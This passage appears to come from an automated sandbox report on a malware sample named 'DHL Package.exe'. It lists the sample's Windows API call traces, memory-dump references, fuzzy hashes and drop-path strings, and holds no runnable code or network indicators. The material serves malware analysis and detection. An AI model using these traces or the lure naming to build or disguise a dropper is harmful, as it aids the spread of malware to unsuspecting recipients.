                                                                                                  • Part of subcall function 00405443: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054D6
                                                                                                  • Part of subcall function 00405443: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054F0
                                                                                                  • Part of subcall function 00405443: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054FE
                                                                                                  • Part of subcall function 004059C4: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,Error launching installer), ref: 004059ED
                                                                                                  • Part of subcall function 004059C4: CloseHandle.KERNEL32(?), ref: 004059FA
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                                  • Part of subcall function 0040687B: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040688C
                                                                                                  • Part of subcall function 0040687B: GetExitCodeProcess.KERNEL32(?,?), ref: 004068AE
                                                                                                  • Part of subcall function 00406322: wsprintfW.USER32 ref: 0040632F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 2972824698-0
                                                                                                • Opcode ID: f906b7c78a5edeb734fbc228ec77ee2ff4005b91535a7ec60c46a56965a0dc9a
                                                                                                • Instruction ID: 4d96ac15eb21dec6eadeffd875f927664214cc5c784fe1dba304e89e249c00b1
                                                                                                • Opcode Fuzzy Hash: f906b7c78a5edeb734fbc228ec77ee2ff4005b91535a7ec60c46a56965a0dc9a
                                                                                                • Instruction Fuzzy Hash: 2CF09072A05112DBCB20EFA699849EE76F4EF00319B21453BE512B21D0C3BC4E428A6E
                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: 017bebf2ae80f01aa6e0fc81b167a013b35d274b07bfaa4a9130182a9ccc4be7
                                                                                                • Instruction ID: 4b0e07c71dfd6a470dbcaf672fe51c7697a76a8b28de1eb21f3750cf6b8f93dc
                                                                                                • Opcode Fuzzy Hash: 017bebf2ae80f01aa6e0fc81b167a013b35d274b07bfaa4a9130182a9ccc4be7
                                                                                                • Instruction Fuzzy Hash: 72D05E73B201008BC710DFB8BE8545E73B8FB503193308837D842E2191E6B888528629
                                                                                                APIs
                                                                                                • GlobalAlloc.KERNELBASE(00000040,?,6CA7123B,?,6CA712DF,00000019,6CA711BE,-000000A0), ref: 6CA71225
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2308297886.000000006CA71000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA70000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2308249101.000000006CA70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2308349849.000000006CA74000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2308398309.000000006CA76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6ca70000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocGlobal
                                                                                                • String ID:
                                                                                                • API String ID: 3761449716-0
                                                                                                • Opcode ID: 64394c0035b8d9659b9e5339aafcafb966a4f9934eb2edb2f98ac217bd038597
                                                                                                • Instruction ID: d212a1556a3e2ce48b60ea53ab420c3136bf6134ba18ad489c81c797a9446d8c
                                                                                                • Opcode Fuzzy Hash: 64394c0035b8d9659b9e5339aafcafb966a4f9934eb2edb2f98ac217bd038597
                                                                                                • Instruction Fuzzy Hash: B6B01274B00211DFEE058B64CC0EF343274FB01301F04C010F601C0180C22448038938
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404871
                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0040489B
                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040494C
                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404957
                                                                                                • lstrcmpiW.KERNEL32(Call,00423708,00000000,?,?), ref: 00404989
                                                                                                • lstrcatW.KERNEL32(?,Call), ref: 00404995
                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049A7
                                                                                                  • Part of subcall function 00405A25: GetDlgItemTextW.USER32(?,?,00000400,004049DE), ref: 00405A38
                                                                                                  • Part of subcall function 0040668A: CharNextW.USER32(?,*?|<>/":,00000000,00000000,77163420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Package.exe",0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 004066ED
                                                                                                  • Part of subcall function 0040668A: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 004066FC
                                                                                                  • Part of subcall function 0040668A: CharNextW.USER32(?,00000000,77163420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Package.exe",0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00406701
                                                                                                  • Part of subcall function 0040668A: CharPrevW.USER32(?,?,77163420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Package.exe",0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00406714
                                                                                                • GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404A6A
                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A85
                                                                                                  • Part of subcall function 00404BDE: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C7F
                                                                                                  • Part of subcall function 00404BDE: wsprintfW.USER32 ref: 00404C88
                                                                                                  • Part of subcall function 00404BDE: SetDlgItemTextW.USER32(?,00423708), ref: 00404C9B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                • String ID: A$C:\Users\user\AppData\Local\peggle$Call
                                                                                                • API String ID: 2624150263-68931660
                                                                                                • Opcode ID: ac22eba4f4e0706a7aa2aa9248de87666ca7b8c05486c05dfef1647bf889efd6
                                                                                                • Instruction ID: d667353cedc46192e8d163e6c277cef07b4b15ed6202573052c67ff26174fc6d
                                                                                                • Opcode Fuzzy Hash: ac22eba4f4e0706a7aa2aa9248de87666ca7b8c05486c05dfef1647bf889efd6
                                                                                                • Instruction Fuzzy Hash: 02A194B1A00209ABDB11AFA5CD45AAF77B8EF84314F10803BF611B62D1D77C99418F6D
                                                                                                APIs
                                                                                                  • Part of subcall function 6CA7121B: GlobalAlloc.KERNELBASE(00000040,?,6CA7123B,?,6CA712DF,00000019,6CA711BE,-000000A0), ref: 6CA71225
                                                                                                • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6CA71C8D
                                                                                                • lstrcpyW.KERNEL32(00000008,?), ref: 6CA71CD5
                                                                                                • lstrcpyW.KERNEL32(00000808,?), ref: 6CA71CDF
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6CA71CF2
                                                                                                • GlobalFree.KERNEL32(?), ref: 6CA71DD4
                                                                                                • GlobalFree.KERNEL32(?), ref: 6CA71DD9
                                                                                                • GlobalFree.KERNEL32(?), ref: 6CA71DDE
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6CA71FC8
                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 6CA72182
                                                                                                • GetModuleHandleW.KERNEL32(00000008), ref: 6CA72201
                                                                                                • LoadLibraryW.KERNEL32(00000008), ref: 6CA72212
                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 6CA7226C
                                                                                                • lstrlenW.KERNEL32(00000808), ref: 6CA72286
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2308297886.000000006CA71000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA70000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2308249101.000000006CA70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2308349849.000000006CA74000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2308398309.000000006CA76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6ca70000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 245916457-0
                                                                                                • Opcode ID: 5769710c866d4236a8092d18cf0e6862ae2143f10994d9d296cfab7a67ce4563
                                                                                                • Instruction ID: e74901bef0c0faab744fa8191b3b979389b263dc34d0eeaa340903f1d444cab6
                                                                                                • Opcode Fuzzy Hash: 5769710c866d4236a8092d18cf0e6862ae2143f10994d9d296cfab7a67ce4563
                                                                                                • Instruction Fuzzy Hash: F0228C79D04206DADB30CFA9C5946FEB7F0FB05309F24462AD269E6A80D77499C58F70
                                                                                                APIs
                                                                                                • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\peggle\Dilettantkomediers, xrefs: 00402261
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateInstance
                                                                                                • String ID: C:\Users\user\AppData\Local\peggle\Dilettantkomediers
                                                                                                • API String ID: 542301482-4134240001
                                                                                                • Opcode ID: ee6a8428052df5805d107c8c5a2719c4b59fc84213f623760ea1d3354a2c3362
                                                                                                • Instruction ID: ffb8b13858b70c1ff9263f9ad1230fafd83ab24b06fb2866c5c71dc23dde5df7
                                                                                                • Opcode Fuzzy Hash: ee6a8428052df5805d107c8c5a2719c4b59fc84213f623760ea1d3354a2c3362
                                                                                                • Instruction Fuzzy Hash: 1F411675A00209AFCF00DFE4C989A9E7BB6FF48304B2045AAF515EB2D1DB799981CB54
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404DB5
                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404DC2
                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E0E
                                                                                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404E25
                                                                                                • SetWindowLongW.USER32(?,000000FC,004053B7), ref: 00404E3F
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E53
                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404E67
                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404E7C
                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E88
                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E9A
                                                                                                • DeleteObject.GDI32(00000110), ref: 00404E9F
                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404ECA
                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ED6
                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F71
                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404FA1
                                                                                                  • Part of subcall function 00404366: SendMessageW.USER32(00000028,?,00000001,00404191), ref: 00404374
                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FB5
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404FE3
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404FF1
                                                                                                • ShowWindow.USER32(?,00000005), ref: 00405001
                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405102
                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405164
                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405179
                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040519D
                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051C0
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004051D5
                                                                                                • GlobalFree.KERNEL32(?), ref: 004051E5
                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040525E
                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405307
                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405316
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00405340
                                                                                                • ShowWindow.USER32(?,00000000), ref: 0040538E
                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00405399
                                                                                                • ShowWindow.USER32(00000000), ref: 004053A0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                • String ID: $M$N
                                                                                                • API String ID: 2564846305-813528018
                                                                                                • Opcode ID: 8584f3799b0db8d261290d7efeb258875c9650e4874f8aded0a11708937f2ed0
                                                                                                • Instruction ID: f13cb60032faeb06b1ff68bd0c1dc2f430bb97b794b1e627908efdb4cc4bd96d
                                                                                                • Opcode Fuzzy Hash: 8584f3799b0db8d261290d7efeb258875c9650e4874f8aded0a11708937f2ed0
                                                                                                • Instruction Fuzzy Hash: 04127DB0900609EFDF209F95CD45AAE7BB5FB84314F10817AFA10BA2E1D7798951CF58
                                                                                                APIs
                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040458E
                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004045A2
                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045BF
                                                                                                • GetSysColor.USER32(?), ref: 004045D0
                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045DE
                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045EC
                                                                                                • lstrlenW.KERNEL32(?), ref: 004045F1
                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045FE
                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404613
                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 0040466C
                                                                                                • SendMessageW.USER32(00000000), ref: 00404673
                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040469E
                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046E1
                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004046EF
                                                                                                • SetCursor.USER32(00000000), ref: 004046F2
                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040470B
                                                                                                • SetCursor.USER32(00000000), ref: 0040470E
                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040473D
                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040474F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                • String ID: Call$N$gD@
                                                                                                • API String ID: 3103080414-3987889410
                                                                                                • Opcode ID: c2a8691b99c0880d176a200d2dcbd178e790d1d94455f1632e384604a8e92c19
                                                                                                • Instruction ID: c6d0c18f0759a08483bb7b351ebc970df30fae26c4fd20534e815ca7361c8267
                                                                                                • Opcode Fuzzy Hash: c2a8691b99c0880d176a200d2dcbd178e790d1d94455f1632e384604a8e92c19
                                                                                                • Instruction Fuzzy Hash: FB6171B1900209BFDF10AF64DD85AAA7B69FB85314F00813AFA05B72D0D7789D51DB98
                                                                                                APIs
                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                • DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                • String ID: F
                                                                                                • API String ID: 941294808-1304234792
                                                                                                • Opcode ID: 80cfb8c675e835c75fd7954a1f24ba06797c47b4a778c986a5d394adc8f03950
                                                                                                • Instruction ID: d01d0d5cc9b133415a9533ecc51a0e37331fb978861fbb258d472761deeb6ec3
                                                                                                • Opcode Fuzzy Hash: 80cfb8c675e835c75fd7954a1f24ba06797c47b4a778c986a5d394adc8f03950
                                                                                                • Instruction Fuzzy Hash: 80418C71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA1A0CB34D955DFA4
                                                                                                APIs
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061C2,?,?), ref: 00406062
                                                                                                • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 0040606B
                                                                                                  • Part of subcall function 00405E36: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E46
                                                                                                  • Part of subcall function 00405E36: lstrlenA.KERNEL32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
                                                                                                • GetShortPathNameW.KERNEL32(?,004275A8,00000400), ref: 00406088
                                                                                                • wsprintfA.USER32 ref: 004060A6
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 004060E1
                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060F0
                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406128
                                                                                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 0040617E
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0040618F
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406196
                                                                                                  • Part of subcall function 00405ED1: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\DHL Package.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405ED5
                                                                                                  • Part of subcall function 00405ED1: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405EF7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
